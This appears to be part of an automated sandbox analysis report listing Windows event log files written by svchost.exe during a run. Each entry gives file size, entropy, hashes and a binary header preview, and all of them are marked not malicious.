                                                      Preview:ElfChnk......................................!..X"....u........................................................................N............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................^...............................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.891613133429162
                                                      Encrypted:false
                                                      SSDEEP:768:F4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13/:3
                                                      MD5:323B15A3B6A505ABF1F1A5455BDEAB55
                                                      SHA1:350D6292354A4F38F0411F761C9E6BB45E4F52BE
                                                      SHA-256:A9B17FDF8E2AEF739CDA87AD1D4E1ED7CBE9C24061BB655773F69088C5173B79
                                                      SHA-512:5D18E7D710257229E782E3299D5305DF7A914A4AAFD6DE6569F7760EECC6683E5D0176C4274387B48399723CF2F31E4724517222DAFC0EFE27DE9BB902934BBB
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................(.....H8....................................................................)...................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.377479101988107
                                                      Encrypted:false
                                                      SSDEEP:384:ShKyPygyR4QyyyCJyTyYyhyEB/X/n/P/knJ/8i/y/R/nutDxfInydKDU1xV8k+uz:Su4CutDmUjV8k+u7eUtHpoVWg3q
                                                      MD5:DCCE3CD1A0D72074C613DA95A8A24E6C
                                                      SHA1:5E8BECE9AF78E659969E67A94CF5DA8AEAE1E291
                                                      SHA-256:97895F86EB3CFBCD1FF9021F8628061D6825A6A96F0A25A957BE97C1DA22F7EB
                                                      SHA-512:12D65AF9D588E593F98A04B1AF4D3AC0C443563203C1C7917BEBD7312F57E71FE1C95639D81CD8E36E18AEAC43F73D303FF6A736CD508ABF60768A895B418E78
                                                      Malicious:false
                                                      Preview:ElfChnk.................R.......Z...............8.../U.!....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**..X...R........A..MQ........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4502735979603685
                                                      Encrypted:false
                                                      SSDEEP:768:/tXuRePtjkY4SFbGq0DGve/lmK63AWnevi6al:lXAktPFbG/DGvD3AW9
                                                      MD5:9476D78F7AFA28FEA43DC737C7A5016F
                                                      SHA1:DDE1D44A2ED8B3495CBF888A34BF75C4404055AD
                                                      SHA-256:0865145BEE99A371832F8EF6E7849850BBD0CEB07EC348673723D150BA2D0C05
                                                      SHA-512:1C99C3D55DEFD612727168806BEF77A7C43580A4BC64A61AA063BBB1FD7EFA09AE60BA725DC787EAF2843F8393DB277D14FCFB7FCC1FDB9CB8D392EEB4DB85C2
                                                      Malicious:false
                                                      Preview:ElfChnk.........N...............N...........`.......v23<........................................................................................l...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................OP...........&.......8..................&........4..........o....1../)..............................w?..**...............?.;v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7288447838351539
                                                      Encrypted:false
                                                      SSDEEP:384:khP8o8Z85848V8M8g8D8R8E8x8jO89868:kU
                                                      MD5:900B1B576C36C0B2FC590A5CE7309203
                                                      SHA1:942049A72CE456363E77F0BAE82D6701A3A61D72
                                                      SHA-256:32FC11CA9E080928B315A43BD61806D103FE9B674B9A69F6A145C3BC2D126D19
                                                      SHA-512:6FEDA7E7D931D132DF6AB4511DD693591900AA0B6FA461295E4EF7B2E4DF8478ADEB889ED131C84E6C0723904D4B0C4C738A7E541E2C227A4086BFBD217A278F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................@..........R....................................................................de.(........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................v...............................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.7569361728015083
                                                      Encrypted:false
                                                      SSDEEP:1536:xXhtUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:xXrnS
                                                      MD5:F11FBFE39E6FE8CE54EC024EB5B5A98E
                                                      SHA1:5DA1F1BACFA94AB8B14B2397DFB9E6EA2824DC3F
                                                      SHA-256:F704DC8817FA01D3963C08711460FB4AB36E35DDD229192473AD71B6B7F4689D
                                                      SHA-512:F1AEB128BD8BEABE7EF262D6133DD864CF88FCF6258FDB2B0EB92B312B91DE40C2513EABDEDD2E82B2F747933A42B5D737B5820695DAAF40EA4A3BAB981DEB2D
                                                      Malicious:false
                                                      Preview:ElfChnk.........&...............&...........`G...I...%".....................................................................D.U................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................=......................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3435273270897063
                                                      Encrypted:false
                                                      SSDEEP:768:q0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O2aWQYIW02cWW+EWZ:acE
                                                      MD5:41DFEEC6FB9A58E02D87AC6CE244D440
                                                      SHA1:EAC1B6A060C57B3A4134C818F736DF83384166D7
                                                      SHA-256:ADD4FDA1D195B45C71E630E98DC2F02DA94950897DE481AB3F90C1043E42304D
                                                      SHA-512:AC8CA0006FE3B7B01F6A5DCB1C8113D01565778BE06EE80E388DD5F6D12188D7939C178A69FFA234F6DE27B1C24854C6D34470AE8479DE5C06B062AD0AE776F9
                                                      Malicious:false
                                                      Preview:ElfChnk.........<...............<...........8t..hv.... n.....................................................................*.t................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&................................b..........................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):78032
                                                      Entropy (8bit):4.113614013245803
                                                      Encrypted:false
                                                      SSDEEP:384:Jhbixkk1bdzpFEVQ35pIixR5pDXixR5yYcixR5pbixR5pEk5pbik5pKik5yY5LbY:JdLpBVi7CP0HvIls
                                                      MD5:97AF1E7930F32D086E6DBABA1244916C
                                                      SHA1:231C21C9CC7879C4CAC519DAC578BF13EFEFFEFF
                                                      SHA-256:4D037D0DD4A7180541A8AB09AD5E689C627BA60597B20DAFB69FC3D7C3CD8F86
                                                      SHA-512:2C7B2095432A4DFAF65369D11E5F3B552C3A063ED4AD8DE31216F8E1D43489CA6C662041A8B7859E280FA7543F6D8CA220DBFFB36A07DD723F8838B8D4B74D38
                                                      Malicious:false
                                                      Preview:ElfChnk.'.......+.......'.......+............$..X+..|.......................................................................a]..................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F...........................................-.......................................&...............................................................**......'...........v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.331574255119962
                                                      Encrypted:false
                                                      SSDEEP:384:NkGf/hDGCyCkCzCRCFCxCiCuCLCBCF9CAC1CZ2go2K2EK2i2O2sr2JCNCuCFtCST:NkGf/drOd1eyZ3OwSBStl
                                                      MD5:66927421ECE4307DCB1A53295722997D
                                                      SHA1:B8A51477D0FC37B4CB246AB8600553E4CE6D13F2
                                                      SHA-256:D39114FA0E5E223F8E4FD3FBADD79B7BC5EC5475F0B1A69C51FA58B23B486278
                                                      SHA-512:E3D9A936F24D86D0FFBFBCF0E8F0DAE87209AD8D7D23F2889A824AE87F10B44EF29C80062FF2042A3F93CE5F40F2DD1383D147FA16FBC9AD9604E1BCFF2B5D94
                                                      Malicious:false
                                                      Preview:ElfChnk.U...............U...................x.........?.....................................................................a...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&........................q......................Yd...............^......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.455832540784598
                                                      Encrypted:false
                                                      SSDEEP:1536:oAmCWdBxpHKiGVm4DPBPpPl4vy/vINPqRy3xJ0YOtSIg06H5DQDOSRgpHRCQ8ofu:oAmCWdBxpHKiGVm4DPBPpPl4vy/vINPi
                                                      MD5:0C10329DAFA9D19DF3495634F040FB6A
                                                      SHA1:B9775262572B6D0E4D10173F363CE0FFB1DBB4D6
                                                      SHA-256:E2CA2F4586AC7F7DEC19543F896DDAFC6EEEA42517CF52557311D072D7DE9071
                                                      SHA-512:1BDABA417BE73B291F5126B61A1FF0434476F3282FE1CF1E677079443DB8C947F9605713585553195CEBC295392A3A55D24ED8168EF51E71EC13A4455C02001A
                                                      Malicious:false
                                                      Preview:ElfChnk......................................e..xg...j;......................................................................te.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................R..............................................................**................U6q.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.47976452651458
                                                      Encrypted:false
                                                      SSDEEP:1536:zRcxzFFB8Qg4nS7wOetMPGeIgi4+J1c9cc+1B9xUf865kVwH4jUT8LFPSTGpCAPC:zRcxzFFB8Qg4nS7wOetM+eIgi4+J1c9H
                                                      MD5:0BE10B2C47C931D2C60C97F927E8A891
                                                      SHA1:5F88045FCD850083704BA9A6444FC31A2BAA2173
                                                      SHA-256:E4F5B646A086E40E7C6C5DC610B2EA7F22347CE23894A4B3DB8ABA5AC49236AA
                                                      SHA-512:7F8E8BEFB40F215799E213FCB80CCB8FBA43F8A073ECA952AE6E2B96BC9BA5CE281A576811DCD5C8047ACC30009C046E1A78CD14C1343DAE927760638E8E3EE2
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................h.........C.....................................................................A0.;........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...................ir..............9p...k..............qt......**..............b4..v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.525904809609912
                                                      Encrypted:false
                                                      SSDEEP:384:RfhQ7F7b7+I7je737AY7fG7EW7f7y7Z7r7c76777z7M7y7z797M7z757E7p7z7Rz:x9uAMM2hs
                                                      MD5:E020B14C787AA3075A14C6716D2491AD
                                                      SHA1:33910F10CD0772EA5BCE376FD3642070D23AE91A
                                                      SHA-256:3B64461A64296366D509580BEEB10745E4AD18A494817B0467166FBE9B2EC3F0
                                                      SHA-512:2FB2B97788B75EC7B52CB49AEB606403FEB549BF156A8DA1CE9D4F1A5399F7EC8368A55EC354000964F2E6AEAE568705A36049E203E40531FA720E71D9289D5A
                                                      Malicious:false
                                                      Preview:ElfChnk......................................e...g...\.......................................................................I..............................................=...........................................................................................................................f...............?...........................m...................M...F............................*...............#..s...........&........................C.......................................(......................**..............>.;.q.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3387125657910106
                                                      Encrypted:false
                                                      SSDEEP:384:Thc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinX:T6Ovc0S5UyEeDgLFOQClhty
                                                      MD5:B1ADDD16B72A614A30B256BCFDB99AC8
                                                      SHA1:81084E39A35B6B891B623EC03DB30F11093D831D
                                                      SHA-256:A37E58A921282D11D70A963C34C8CA8B61EE9E16EB90A6499FBEBD332EDFE386
                                                      SHA-512:B4A9A2B4980666CA5BCDCCC38694C6B25C83A62A97FC0513ACDE11416F7A5215D3698DCD6C5157051787B2E5266547E4232B8CF61E2752909A7B8B856BEAFD0A
                                                      Malicious:false
                                                      Preview:ElfChnk.........@...............@...........`v..@x...*.D........................................................................................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................wb......&........................................................e..............................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.78398437074799
                                                      Encrypted:false
                                                      SSDEEP:384:mIhGuZumutu4uEu5uOuDuyb2uPu1uQu1auwuFu:mI+
                                                      MD5:2A99B668C43BBB4B0B6A0287A57EB586
                                                      SHA1:47CDE1E4E8A8F4EFB0F51127B65A470EBE5846C6
                                                      SHA-256:70C46DCB68BDAAADE324AC6F7895DE2398DD8C3D5A4342DAABE9E5BAFC0FE4A5
                                                      SHA-512:5434DDEF724A83BD74F94723306046B9FD1B572E41B640B98EFAA7059D70163CFAF85763B05C6D168F0457E48E044B2CE97F43B92ACD25C99FF89F9DAD60899D
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................H!...".............................................................................................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................>...............................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.2398054630975714
                                                      Encrypted:false
                                                      SSDEEP:384:58hVApALAnypA2A4+nAYaAYKAYiARAY2AtAYGAqJ8AAArIPbA7AtAeAvAqfAsA2T:SUyppJh6XfE7mR8aihhx5a2pT
                                                      MD5:19652704902B46A3AE9936FD499B097C
                                                      SHA1:779830BECFC982908B990E781B9807E342DC4A4A
                                                      SHA-256:99217D71173008010489C6D5D5A650773706835744BAE82B8FE3A7747EFC3DD8
                                                      SHA-512:B8018EE6F8C1BA0F952FF5AA069BEAD7F0421D9E81D1570C5CD8A418B22625135E97F311B43C8528BBA08CD6C3B04184551FCEABC9A542C32194160361DAAE26
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................Xk...l..Q........................................................................G..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................E$..............m"......................................&...............................................................**................C.u.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-769, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 96772112897977767655460831232.000000
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.770151261804737
                                                      Encrypted:false
                                                      SSDEEP:384:bhdpj0qpR0npRbHpRiTpR5XpR4fpR/npRWrpRtHpR8pFpRj3pRqLpRBfpRA1f1px:bevfbJh
                                                      MD5:59B2683471F07FFB59E483A8DA9539DC
                                                      SHA1:24A71D79F9EE283DA6DE91D5DE303B81A5FFDF61
                                                      SHA-256:1811EE0C8B74D570153511E1FED3013510C93EE0038FFEB0F6EF4DCC4137FE17
                                                      SHA-512:0F9F4D5C2B345F2C4FAA3CC958E46B98A883528731E3137852462ACC2809A9E5F4727EBE69BA70AFC23C3EA8CAFE939B6B390A8CA9E64E3689B780A1010C33A9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................e..Hi...t.........................................................................v........................................8...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**.............._h..v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.8291249377738152
                                                      Encrypted:false
                                                      SSDEEP:384:mhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBS:mwDoh1VoaHDuxTjf1a
                                                      MD5:0184F70509EC0A792E050CD9CF508DFB
                                                      SHA1:421FE0CB583647B818101AD7A2635EB586F192B1
                                                      SHA-256:94283857B30C0889293FD6109A9BAB6623FAD76728BEC8D447515A80FC34BC3A
                                                      SHA-512:A5C143B8D8936B79FFD3AE8D78EF7A0597943D7B12D49D8851DFA9438BADBCAD8E770DF3B1DC39F1D8B531885EBE64CF32965C48314B05EF74F673DBC1B4B9D6
                                                      Malicious:false
                                                      Preview:ElfChnk.\...............\...........................^W{........................................................................C................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.124694262171386
                                                      Encrypted:false
                                                      SSDEEP:384:DhwCCRzCaCkClCzCYC/CyCVCGCMCvCwCWwCvClCviC:DKFeH
                                                      MD5:2BF10029572EE57CDF4699604763C4C9
                                                      SHA1:A7BDF922E5098ADF3BA763FDA5129C410BCADE55
                                                      SHA-256:2BC8BC7C1BE725086D3E162BD40846C448427BAB6884731EB392D60B053D6546
                                                      SHA-512:7D81E63F20444C41D9F8282C48A2187646BADECEE8BC3B84F379CCE5B0BAE29A638C9AC35A29BDEE98B754A1919D4FE9B42A3022B4B9EEDA751A061098A241EC
                                                      Malicious:false
                                                      Preview:ElfChnk......................................1..(4..........................................................................x..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................v)........................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):9560
                                                      Entropy (8bit):4.529550178519467
                                                      Encrypted:false
                                                      SSDEEP:192:SMbs5M8nM2MMSJMIMrWMmrMOu/M4M0bMn5MEMRMz:SMbqMeMpMSJMIMiMmrMJ/M4M0bMn5MEd
                                                      MD5:C864050435092F559499677AC4D1D2A6
                                                      SHA1:F7BC6BB2D7F03337D047978C058B9391CC806599
                                                      SHA-256:925DADB1A74072668D76D29D60B0B6E4819D19A9BF14A0022C255F82D669CB47
                                                      SHA-512:08BB4DAEC7D3C81D81F64971E47801BB4D1664CC92CF94C561A6B3A9D14A29736B7C9F49451B1CD016548F986314A3A8BBBC1E3BE67A276DF06256159AF1C16E
                                                      Malicious:false
